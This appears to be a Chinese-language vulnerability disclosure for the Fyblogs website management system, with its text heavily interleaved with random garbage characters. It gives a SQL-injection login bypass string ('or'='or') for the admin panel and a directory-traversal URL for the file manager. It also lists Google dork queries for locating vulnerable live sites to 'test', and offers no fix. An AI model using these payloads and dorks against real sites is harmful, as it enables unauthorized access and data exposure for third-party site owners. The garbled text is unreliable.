漏洞类型: 未授权访问/权限绕过9 @2 J* |2 {) a E8 a
! p( `' A7 W" `1 J7 Z' r简要描述:
* A# H9 w; x8 z% e6 n
- G/ o8 n5 S8 }" d1 v3 BFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!5 a1 b% s3 c* _0 d3 B
1 ^. T2 B' [8 }5 k
详细说明:, S# J/ V2 I- m( l0 [+ O
! x: a! d5 F, F) t/ C% s. o, F后台万能密码 'or'='or': A7 S& v7 d# y
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
/ e- K- |# z1 f2 cadmin/uploadfile.asp?currentFolder=/upfiles/../
0 @! z1 f' u2 Z) f7 k u5 a1 d/ Z; Q, ~" ?
漏洞证明:. `- Y! W8 [- h2 U% V; i
/ s! m% |; K+ |( x谷歌:inurl:type.asp?id=1 新闻中心7 r. i ~- j6 n
或者 :inurl:download_ok.asp?% o: C2 p; ~# ^) F4 b& [
* ]$ a" n2 _' O" U4 l; N: ?
可以测试
* W* ^! k3 r+ h+ Q v1 G5 a: f+ {6 A, d* ?, I3 D
( S/ s, T7 l* j! G, t
|